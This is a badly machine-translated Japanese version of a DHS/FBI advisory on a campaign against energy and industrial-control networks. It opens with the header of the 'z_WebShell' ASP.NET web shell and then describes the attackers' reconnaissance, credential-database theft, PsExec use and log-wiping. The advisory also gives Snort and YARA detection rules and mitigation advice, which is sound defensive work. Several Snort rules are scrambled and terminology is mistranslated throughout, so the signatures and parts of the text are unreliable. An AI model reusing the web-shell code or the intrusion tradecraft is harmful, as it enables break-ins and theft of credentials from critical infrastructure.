<%@ import Namespace = "System.Diagnostics"%>
<%@ import Namespace = "System.Data"%>
<%@ import Namespace = "System.Management"%>
<%@ import Namespace = "System.Data.OleDb"%>
<%@ import Namespace = "Microsoft.Win32"%>
<%@ import Namespace = "System.Net.Sockets"%>
<%@ import Namespace = "System.Net"%>
<%@ import Namespace = "System.Runtime.InteropServices"%>
<%@ import Namespace = "System.DirectoryServices"%>
<%@ import Namespace = "System.ServiceProcess"%>
<%@ import Namespace = "System.Text.RegularExpressions"%>
<%@ Import Namespace = "System.Threading"%>
<%@ Import Namespace = "System.Data.SqlClient"%>
<%@ import Namespace = "Microsoft.VisualBasic"%>
<%@ Import Namespace = "System.IO.Compression"%>
<%@ Assembly Name = "System.DirectoryServices、Version = 2.0.0.0、Culture = neutral、PublicKeyToken = B03F5F7F11D50A3A"%>
<%@ Assembly Name = "System.Management、Version = 2.0.0.0、Culture = neutral、PublicKeyToken = B03F5F7F11D50A3A"%>
<%@ Assembly Name = "System.ServiceProcess、Version = 2.0.0.0、Culture =ニュートラル、PublicKeyToken = B03F5F7F11D50A3A"%>
<%@ Assembly Name = "Microsoft.VisualBasic、Version = 7.0.3300.0、Culture =ニュートラル、PublicKeyToken = b03f5f7f11d50a3a"%>
<!DOCTYPE html PUBLIC " - // W3C // DTD XHTML 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat = "server">
パブリック・ストリングPassword = "<REDACTED>";
パブリック文字列z_progname = "z_WebShell";
...
____________________________________________________________________________________________
ステージ7:目標に対する行動
DHSとFBIは、リモートアクセスサービスとVPN、RDP、OWA(Outlook Web Access)などのインフラストラクチャを活用して、脅威の主体を特定しました。脅威の俳優は、複数の意図されたターゲットに接続するためにステージングターゲットのインフラストラクチャを使用しました。
内部偵察
意図した犠牲者へのアクセスを得ると、脅威アクターはネットワーク内で偵察操作を実施した。DHSは、被害者のネットワーク内のファイルサーバーの特定と参照に焦点を当てた脅威の俳優を観察しました。
標的のネットワーク上にいったん到達すると、脅威アクターは、RDPを介して被害者のドメインコントローラにアクセスするために特権のある資格情報を使用しました。一度ドメインコントローラを操作すると、脅威アクターはバッチスクリプト「dc.bat」と「dit.bat」を使用して、ホスト、ユーザー、および環境に関する追加情報を列挙しました。これらのスクリプトから観察された出力(テキスト文書)は次のとおりです。
admins.txt
completed_dclist.txt
completed_trusts.txt
completed_zone.txt
comps.txt
conditional_forwarders.txt
domain_zone.txt
enum_zones.txt
users.txt
脅威の俳優たちは、ファイル "ntds.dit"と "SYSTEM"レジストリハイブも収集しました。DHSは、脅威アクターがこれらのファイルをすべて "SYSTEM.zip"と "comps.zip"という名前のアーカイブに圧縮していることを確認しました。
脅威の俳優たちは、Windowsのスケジュールされたタスクとバッチスクリプトを使って "scr.exe"を実行し、ネットワーク上のホストから追加情報を収集しました。ツール "scr.exe"は、脅威アクタがネットワーク上のシステムの画面をキャプチャするために使用したスクリーンショットユーティリティです。SymantecのDragonfly 2.0レポートで報告されているように、 "scr.exe"のMD5ハッシュがScreenUtilのMD5と一致しました。
少なくとも2つの例では、脅威アクターは、PsExecツールを実行するために、「pss.bat」および「psc.bat」というラベルのバッチスクリプトを使用しました。さらに、脅威の俳優はツールPsExecの名前を "ps.exe"に変更します。
バッチスクリプト( "pss.bat"または "psc.bat")は、ドメイン管理者の資格情報で実行されます。
ディレクトリ "out"は、ユーザーの%AppData%フォルダに作成されます。
PsExecは、ネットワーク上で "scr.exe"を実行し、 "ip.txt"でシステムのスクリーンショットを収集するために使用されます。
スクリーンショットのファイル名は、ホストのコンピュータ名に基づいてラベル付けされ、ターゲットのC:\ Windows \ Tempディレクトリに ".jpg"拡張子で保存されます。
スクリーンショットは、バッチスクリプトが実行されたシステムの新しく作成された「out」ディレクトリにコピーされます。
ある例では、DHSは「out.zip」ファイルを作成したことを確認しました。
DHSは脅威主体がホスト情報のリストを含んでいたと考えられる "ip.txt"と名付けられたテキスト文書を作成し、変更することを観察した。脅威の俳優は、ホストのソースとして "ip.txt"を使用して追加の偵察活動を行った。さらに、バッチスクリプトが実行された結果、テキスト文書「res.txt」および「err.txt」が作成されていることが確認されました。ある例では、 "res.txt"には、Windowsのコマンド "query user"の出力がネットワーク経由で格納されていました。
<Username>の使用<Password>
<Hostname1>で
-s cmd / c query userを
実行する-s cmd / c <
hostname2 >でquery userを実行する-s cmd / c < hostname3 >でユーザーに問い合せるUSERNAME SESSIONNAME ID状態IDLE TIME LOGON TIME
<user1> 2ディスク1 + 19:34 6/27/2017 12:35 PM
"dirsb.bat"という追加のバッチスクリプトを使用して、ネットワーク上のホストからフォルダとファイル名を収集しました。
脅威の俳優は、バッチスクリプトに加えて、「scr.exe」でスクリーンショットを収集するためにスケジュールされたタスクを使用しました。2つのインスタンスでは、スケジュールされたタスクは、引数 "C:\ Windows \ Temp \ scr.jpg"を使用してコマンド "C:\ Windows \ Temp \ scr.exe"を実行するように設計されています。別の例では、スケジュールされたタスクは、ローカル管理者の "AppData \ Local \ Microsoft \"フォルダーから引数 "pss.bat"で実行するように設計されています。
脅威アクターは一般に、ユーザーのAppDataまたはDownloadsフォルダ内のさまざまなディレクトリからファイルを実行します。いくつかの一般的なディレクトリ名は
Chromex64、
マイクロソフト、
NT、
Office365、
温度、および
更新。
ICSおよびSCADAインフラストラクチャのターゲット設定
複数のケースでは、脅威アクターは、エネルギー発電施設内の制御システムからのデータ出力を含む企業ネットワーク上のワークステーションおよびサーバーにアクセスしました。脅威アクターは、ICSまたは監視制御およびデータ収集(SCADA)システムに関するファイルにアクセスしました。既存の妥協案のDHS分析に基づいて、これらのファイルには、組織に関するICSベンダー名とICS参照文書(「SCADA WIRING DIAGRAM.pdf」または「SCADA PANEL LAYOUTS.xlsx」など)を含む名前が付けられました。
脅威アクターは、ネットワーク上のICSシステムにアクセスするためのプロファイルと構成情報を対象とし、コピーしました。DHSは、ICSシステムへのアクセスに関する構成情報を含む仮想ネットワーク接続(VNC)プロファイルをコピーする脅威アクターを観察しました。DHSは、脅威アクターがアクセスしたHuman Machine Interface(HMI)のスクリーンショット断片を再構成することができました。
この画像は、脅威アクターによってアクセスされたヒューマンマシンインタフェース(HMI)システムの再構成されたスクリーンショットを示しています。 この画像は、脅威俳優の産業制御システム(ICS)環境への関心と関心を示しています。
クリーンアップとカバートラック
複数のインスタンスでは、脅威アクターはステージングターゲット上にクリーンアップ操作を実行するための新しいアカウントを作成しました。作成されたアカウントは、システム、セキュリティ、ターミナルサービス、リモートサービス、および監査の各Windowsイベントログをクリアするために使用されました。脅威の俳優たちは、インストールされたアプリケーションを、ログに記録されているログとともにネットワークに入れたまま削除しました。たとえば、1つの商業施設にインストールされたFortinetクライアントは、使用されたログとともに削除されました。最後に、アクセスされたシステムで使用されている他のアカウントによって生成されたデータが削除されました。
脅威アクターは、作成されたスクリーンショットと特定のレジストリキーを削除することで、意図したターゲットネットワークを駆除しました。法医学分析を通じて、DHSは、脅威主体が、リモートシステムへの接続を追跡するターミナルサーバークライアントに関連するレジストリキーを削除したと判断しました。脅威の俳優たちは、バッチスクリプト、出力テキスト文書、および「scr.exe」のような環境に持ち込まれたツールをすべて削除しました。
検出と応答
このキャンペーンに関連するIOCは、このアラートの付随する.csvファイルおよび.stixファイル内で提供されます。DHSとFBIは、ネットワーク管理者がIPアドレス、ドメイン名、ファイルハッシュ、ネットワークシグネチャ、およびYARAルールを確認し、それらのウォッチリストにIPを追加して悪意のある活動が組織内で観察されているかどうかを判断することを推奨します。システム所有者は、これらの脅威俳優のターゲットに絞られている疑いのあるシステムでYARAツールを実行することも勧められます。
ネットワーク署名とホストベースのルール
このセクションには、脅威アクターのTTPに関連付けられた悪質なアクティビティを検出するために使用できるネットワークシグニチャとホストベースのルールが含まれています。これらのネットワークシグニチャとホストベースのルールは、包括的な検証プロセスを使用して作成されましたが、誤検出の可能性は常に残っています。
ネットワーク署名
(HTTP URIに '/ aspnet_client / system_web / 4_0_30319 / update /'(ビーコン)が含まれています); sid:42000000; rev:1;フロー:確立済み、to_server;内容: "/ aspnet_client / system_web / 4_0_30319 / update /"; http_uri; fast_pattern:のみ; classtype:不良 - 不明;メタデータ:サービスhttp;)
___________________________________
(HTTP URIに '/img/bson021.dat'が含まれています); sid:42000001; rev:1;フロー:確立済み、to_server;コンテンツ: "/ img / bson021。 dat; http_uri; fast_pattern:唯一; classtype:不良 - 不明;メタデータ:サービスhttp;)
________________________________________
(HTTP URIに '/ A56WY'(コールバック)が含まれています); sid:42000002; rev:1;フロー:確立済み、to_server;コンテンツ: "/ A56WY"; http_uri; fast_pattern; classtype:不良 - 不明;メタデータ:サービスhttp;)
_________________________________________
(SMBクライアント要求には 'AME_ICON.PNG'(SMB資格取得)が含まれています); sid:42000003; rev:1;フロー:確立済み、to_server;内容: "| FF | SMB | 7500 00 00 00 | ";オフセット:4;深さ:9;内容:" | 08 00 01 00 | ";距離:3;内容:" | 00 5c 5c | ";距離:2;内:3;内容: "| 5c | AME_ICON.PNG";距離:7; fast_pattern; classtype:不良 - 不明;メタデータ:service netbios-ssn;)
________________________________________
(sMB資格取得) "; sid:42000004; rev:1;フロー:確立済み、to_server;内容:" / tcp_HOME / tcp $ HOME_NET any-> $ EXTERNAL_NET $ HTTP_PORTS(msg: "HTTP URIオプションには '/ame_icon.png' "オプション"; nocase; http_method; classtype:悪意のある不明;メタデータ:サービスhttp;); http_uri; fast_pattern:
_________________________________________
HTTPクライアントヘッダーには 'User-Agent | 3a 20 | Go-http-client / 1.1' "が含まれています; sid:42000005; rev:1;フロー:established、to_server ; content: "User-Agent | 3a 20 | Go-http-client / 1.1 | 0d 0a | Accept-Encoding | 3a 20 | gzip"; http_header; fast_pattern:pcre: "/ \。(?: aspx | txt )?[a-z0-9] {3} = [a-z0-9] {32}&/ U "; classtype:不良 - 不明;メタデータ:サービスhttp;)
__________________________________________
$ HOME_NET any(msg: "SMBサーバートラフィックにはNTLM認証SMBv1セッションが含まれています"; sid:42000006; rev:1;フロー:確立済み、to_client;内容: "| ff 53 4d 42 72 00:00 00 00 80 | "; fast_pattern:のみ;内容:" | 05 00 | ";距離:23; classtype:不良 - 不明;メタデータ:サービスnetbios-ssn;)
YARAルール
これは、このアクティビティに関連付けられたマルウェアの統合ルールセットです。これらのルールはNCCICによって作成され、信頼できるパートナーからの寄付が含まれています。
* /
ルールAPT_malware_1
{
メタ:
description = "inveighペンテストツールと関連する成果物"
著者= "DHS | NCCICコード分析チーム"
date = "2017/07/17"
hash0 = "61C909D2F625223DB2FB858BBDF42A76"
hash1 = "A07AA521E7CAFB360294E56969EDA5D6"
hash2 = "BA756DD64C1147515BA2298B6A760260"
hash3 = "8943E71A8C73B5E343AA9D2E19002373"
hash4 = "04738CA02F59A5CD394998A99FCD9613"
hash5 = "038A97B4E2F37F34B255F0643E49FC9D"
hash6 = "65A1A73253F04354886F375B59550B46"
hash7 = "AA905A3508D9309A93AD5C0EC26EBC9B"
hash8 = "5DBEF7BDDAF50624E840CCBCE2816594"
hash9 = "722154A36F32BA10E98020A8AD758A7A"
hash10 = "4595DBE00A538DF127E0079294C87DA0"
文字列:
$ s0 = "file://"
$ s1 = "/ame_icon.png"
$ s2 = "184.154.150.66"
$ s3 = {87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE}
$ s4 = {33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102}
$ s5 = "(g.charCodeAt(c)^ l [(l [b] + l [e])%256])"
$ s6 = "for(b = 0; 256> b; b ++)k [b] = b; for(b = 0; 256> b; b ++)"
$ s7 = "VXNESWJfSjY3grKEkEkRuZeSvkE ="
$ s8 = "NlZzSZk ="
$ s9 = "WlJTb1q5kaxqZaRnser3sw =="
$ s10 = "for(b = 0; 256> b; b ++)k [b] = b; for(b = 0; 256> b; b ++)"
$ s11 = "fromCharCode(d.charCodeAt(e)^ k [(k [b] + k [h])%256])"
$ s12 = "ps.exe -accepteula \\%ws%-u%ユーザー%-p%パス%-s cmd / c netstat"
$ s13 = {22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429}
$ s14 = {68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70}
$ s15 = {476F206275696C642049443A202266626433373937623163313465306531}
//積極的なペンテストツール
$ s16 = {24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65}
//特定の悪意のある単語の文書PKアーカイブ
$ s17 = {2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B}
$ s18 = {6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2}
$ s19 = {8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39}
$ s20 = {8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4}
$ s21 = {8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4}
$ s22 = "5.153.58.45"
$ s23 = "62.8.193.206"
$ s24 = "/ 1 / ree_stat / p"
$ s25 = "/icon.png"
$ s26 = "/ pshare1 / icon"
$ s27 = "/notepad.png"
$ s28 = "/pic.png"
$ s29 = "http://bit.ly/2m0x8IH"
調子:
($ s0および$ s1または$ s2)または($ s3または$ s4)または($ s5および$ s6または$ s7および$ s8および$ s9)または($ s10および$ s11)または($ s12および$ s13) )または($ s14)または($ s15)または($ s16)または($ s17)または($ s18)または($ s19)または($ s20)または($ s21)または($ s0および$ s22または$ s24)または($ s0と$ s22または$ s25)または($ s0と$ s23または$ s26)または($ s0と$ s22または$ s27)または($ s0と$ s23または$ s28) )
}
ルールAPT_malware_2
{
メタ:
description = "ルールがマルウェアを検出しました"
著者= "その他"
文字列:
$ api_hash = {8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED}
$ http_push = "Xモード:プッシュ" nocase
$ http_pop = "X-mode:pop" nocase
調子:
いずれか
}
ルールQuery_XML_Code_MAL_DOC_PT_2
{
メタ:
name = "Query_XML_Code_MAL_DOC_PT_2"
著者= "その他"
文字列:
$ zip_magic = {50 4b 03 04}
$ dir1 = "単語/ _rels / settings.xml.rels"
$ bytes = {8c 90 cd 4e eb 30 10 85 d7}
調子:
$ zip_magicは0、$ dir1と$ bytes
}
ルールQuery_Javascript_Decode_Function
{
メタ:
name = "Query_Javascript_Decode_Function"
著者= "その他"
文字列:
$ decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B}
$ decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}
$ decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}
$ decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}
$ func_call = "a(\" "
調子:
ファイルサイズ<20KB、#func_call> 20、すべての($ decode *)
}
ルールQuery_XML_Code_MAL_DOC
{
メタ:
name = "Query_XML_Code_MAL_DOC"
著者= "その他"
文字列:
$ zip_magic = {50 4b 03 04}
$ dir = "word / _rels /" ascii
$ dir2 = "word / theme / theme1.xml" ascii
$ style = "word / styles.xml" ascii
調子:
0の$ zip_magicと0x0145の$ dir、0x02b7の$ dir2、0x08fdの$ style
}
ルールz_webshell
{
メタ:
description = "z_webshellの検出"
著者= "DHS NCCICハントと事故対応チーム"
日付= "2018/01/25"
md5 = "2C9095C965A55EFC46E16B86F9B7D6C6"
文字列:
$ aspx_identifier1 = "<%@" nocase asciiワイド
$ aspx_identifier2 = "<asp:" nocase ascii wide
$ script_import = /(import | assembly)名前(スペース)?\ = \ "(System | Microsoft)/ nocase ascii wide
$ case_string = / case \ "z_(dir | file | FM | sql)_ / nocase ascii wide
$ webshell_name = "公開ストリングz_progname =" nocase asciiワイド
$ webshell_password = "パブリック文字列パスワード=" nocase asciiワイド
調子:
1 of($ aspx_identifier *)
#script_import> 10
#case_string> 7
2つの($ webshell_ *)
ファイルサイズ<100KB
}
影響
この俳優のキャンペーンは、エネルギー、原子力、水、航空、建設、重要な製造業の複数の組織に影響を与えました。
溶液
DHSとFBIは、ネットワークユーザーと管理者に対し、以下の検出と防止のガイドラインを使用して、この活動を防御するよう奨励しています。
ネットワークとホストベースの署名
DHSとFBIは、ネットワーク管理者がIPアドレス、ドメイン名、ファイルハッシュ、およびYARAとSnortの署名を確認し、それらの監視リストにIPを追加して、組織内で悪意ある行為が発生しているかどうかを判断することを推奨します。ネットワーク境界ネットフローを確認することで、ネットワークが疑わしい活動を経験したかどうかを判断するのに役立ちます。ネットワークディフェンダーおよびマルウェアアナリストは、関連するYARAおよび.txtファイルに含まれるYARAおよびSnortシグネチャを使用して、悪意のあるアクティビティを特定する必要があります。
検出と予防措置
ユーザーと管理者は、IOCパッケージに記載されているすべてのIPアドレスとドメイン名を次の場所と比較することで、スピアフィッシング、水分補給穴、Webシェル、リモートアクセスアクティビティを検出できます。
ネットワーク侵入検知システム/ネットワーク侵入防御システムログ、
ウェブコンテンツログ、
プロキシサーバーログ、
ドメインネームサーバーの解決ログ、
パケットキャプチャ(PCAP)リポジトリ、
ファイアウォールログ、
ワークステーションのインターネット閲覧履歴ログ、
ホストベースの侵入検知システム/ホストベースの侵入防止システム(HIPS)ログ、
データ損失防止ログ、
交換サーバーログ、
ユーザーのメールボックス、
メールフィルタログ、
メールコンテンツログ、
AVメールログ、
OWAログ、
Blackberry Enterprise Serverログ、および
モバイルデバイス管理のログ
外部のサーバー上のWebシェルの存在を検出するには、IOCパッケージにリストされているIPアドレス、ファイル名、ファイルハッシュを以下の場所と比較します。
アプリケーションログ、
IIS / Apacheログ、
ファイルシステム、
侵入検知システム/侵入防止システムログ、
PCAPリポジトリ、
ファイアウォールログ、および
リバースプロキシ。
ワークステーションファイルシステムとネットワークベースのユーザーディレクトリを検索し、IOCパッケージにある添付ファイル名とハッシュを検索してスピアフィッシングを検出します。
すべての.lnkファイルのユーザープロファイルを含むファイル共有を検索することにより、VDI環境の永続性を検出します。
削除されたログを特定することによって、アクターによる回避技法を検出します。これは、最後に見たエントリを確認し、Windowsシステムログでイベント104を検索することで実行できます。
不正なアカウント、特に最近作成されたアカウントを識別するために、システム上のすべての管理者アカウントを確認して永続性を検出します。
すべてのユーザーのリモートアクセス可能なシステムのアクセス時間を確認することにより、正当な資格情報の悪意のある使用を検出します。異常なログイン時間は、アカウント所有者が確認する必要があります。
漏洩が疑われるユーザーの資格情報をすべてリモートデスクトップおよびVPNセッションで検証し、正当な資格情報の悪意のある使用を検出します。
OWAログでIOCパッケージにリストされているすべてのIPアドレスを検索して、スピアフィッシングを検出します。
メールサーバー、特に外部ユーザーアクセスを持つユーザーに対して作成された新しい電子メールアカウントをすべて検証することにより、ネットワーク経由のスピアフィッシングを検出します。
IOCパッケージにリストされているすべてのファイル名のシステムログを検索して、サーバー上の永続性を検出します。
PowerShellログでIOCパッケージに含まれる ".ps1"で終わるすべてのファイル名を検索して、横方向の移動と権限の昇格を検出します。(注:PowerShellのバージョン5が必要です。また、PowerShellのロギングはアクティビティの前に有効にする必要があります)。
重大なシステム上にインストールされているすべてのアプリケーションを不正なアプリケーション、特にFortiClient VPNとPython 2.7で確認して永続性を検出します。
レジストリの場所 "HKLM \ SOFTWARE \ Policies \ Microsoft \ Windows NT \ Terminal"で "REG_DWORD 100"の値を検索して永続性を検出します。Services \ MaxInstanceCount "と、" HKLM \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ policies \ system \ dontdisplaylastusername "の場所にある" REG_DWORD 1 "の値を指定します。
ドメイン名のないURIからのダウンロードをすべてのプロキシログで検索してインストールを検出します。
このキャンペーンに適用される一般的なベストプラクティス:
関連するUDPポート137を使用してTCPポート139および445をブロックすることにより、SMBおよび関連プロトコルのすべてのバージョンの外部通信を防止します。詳細については、NCCIC / US-CERTのSMBセキュリティベストプラクティスを参照してください。
ネットワーク上の境界ゲートウェイデバイスでWebベースの分散オーサリングとバージョン管理(WebDAV)プロトコルをブロックする。
異常なアクティビティ(オフタイムログイン、不正なIPアドレスログイン、複数の同時ログインなど)のVPNログを監視します。
ネットワーク上にWebフィルタと電子メールフィルタを展開します。既知の不良ドメイン名、送信元、およびアドレスをスキャンするようにこれらのデバイスを設定します。メッセージを受信してダウンロードする前にこれらをブロックします。このアクションは、ネットワークの最初の防衛レベルで攻撃面を減らすのに役立ちます。クラウドレピュテーションサービスを含む評判の高いウイルス対策ソリューションで、すべての電子メール、添付ファイル、およびダウンロード(ホストとメールゲートウェイの両方)をスキャンします。
業界のベストプラクティスに従って、ビジネスシステムおよびネットワークから重要なネットワークまたは制御システムをセグメント化します。
入口点と出口点で適切なロギングと可視性を確保する。
強化されたログが有効になっているPowerShellバージョン5の使用を確認してください。PowerShellの古いバージョンでは、攻撃者が実行した可能性のあるPowerShellコマンドの適切なログが提供されません。PowerShellモジュールのログ、スクリプトブロックのログ、および転写を有効にします。監視および分析のために、関連付けられたログを中央のログリポジトリに送信します。詳細については、FireEyeのブログ記事PowerShell Loggingによる可視性の向上を参照してください。
NCCIC / US-CERTアラート「TA15-314A - 侵害されたWebサーバーとWebシェル - 脅威の認識とガイダンス」に記載されている予防、検出、および緩和の戦略を実装します。
エンドユーザーに適切な電子メールとウェブの使用状況を知らせるトレーニングメカニズムを確立し、最新の情報と分析を強調表示し、フィッシングの一般的な指標を含めます。エンドユーザーは、珍しいメールや不審なメールを報告する方法について明確な指示が必要です。
アプリケーションディレクトリホワイトリストを実装する。システム管理者は、マイクロソフトのソフトウェア制限ポリシー、AppLocker、または同様のソフトウェアを通じて、アプリケーションまたはアプリケーションのディレクトリをホワイトリストに登録することができます。安全なデフォルトでは、PROGRAMFILES、PROGRAMFILES(X86)、SYSTEM32、およびICSソフトウェアフォルダからアプリケーションを実行できます。例外が認められない限り、他の場所はすべて許可しないでください。
例外が存在しない限り、信頼できない外部アドレスから発生したRDP接続をブロックする。妥当性について定期的に例外を審査します。
ミッションクリティカルなシステムのシステムログをセキュリティ情報イベント管理ツール内に少なくとも1年間保管します。
インシデント対応調査の適切な詳細レベルを記録するようにアプリケーションが設定されていることを確認します。
不正なコードの実行を防ぐためにHIPSやその他のコントロールを実装することを検討してください。
最小特権コントロールを確立する。
Active Directoryのドメインおよびエンタープライズ管理者アカウントの数を減らします。
疑わしい脅威のレベルに基づいて、すべてのローカルシステムとドメインシステムにわたってすべてのユーザー、管理者、およびサービスアカウントの資格情報をリセットします。
すべてのユーザーに複雑なパスワードを要求するパスワードポリシーを確立します。
ネットワーク管理のアカウントに外部接続がないことを確認します。
ネットワーク管理者が電子メールおよびインターネットアクセスに特権のないアカウントを使用していることを確認します。
すべての認証に二要素認証を使用し、外部に向いているインターフェイスや高リスク環境(リモートアクセス、特権アクセス、機密データへのアクセスなど)を特に重視します。
特権アカウントによって行われるアクティビティの記録と監査のプロセスを実装します。
権限エスカレーションとロール変更のログ記録とアラートを有効にします。
機密情報が開示されていないことを確認するために、公開可能な情報の検索を定期的に実施する。誤って含まれている可能性のある機密データの写真や文書を確認する。
アラートの記録を含め、ログをレビューするのに十分な人員を割り当てます。
完全な独立したセキュリティ(コンプライアンスではなく)リスクレビュー。
情報共有プログラムを作成し、参加する。
タイムリーなインシデント対応に役立つネットワークおよびシステムの文書を作成し、管理します。ドキュメンテーションには、ネットワーク図、資産所有者、資産の種類、インシデント対応計画が含まれている必要があります。
レポートの通知
DHSは、この文書で説明されている道具や技術の使用を特定した受領者に、直ちにDHSまたは法執行機関に情報を報告するよう奨励します。
インシデント対応リソースや技術支援を要請するには、NCCICcustomerservice@hq.dhs.gov (リンクは電子メール送信)または888-282-0870およびFBIに、現地の現地事務所またはFBIサイバー部門(CyWatch @ fbi。 gov (リンクは電子メールを送る)または855-292-3937)。
参考文献
[1]シマンテック。Dragonfly:洗練された攻撃グループをターゲットにした西洋のエネルギー部門。2017年9月6日(リンクは外部)
[2] CERT CC。脆弱性ノート#672268
[3] CCIRC CF17-010 UPDATE
[4] MIFR-10127623
リビジョン
2018年3月15日:初期バージョン
コメント
コメントを投稿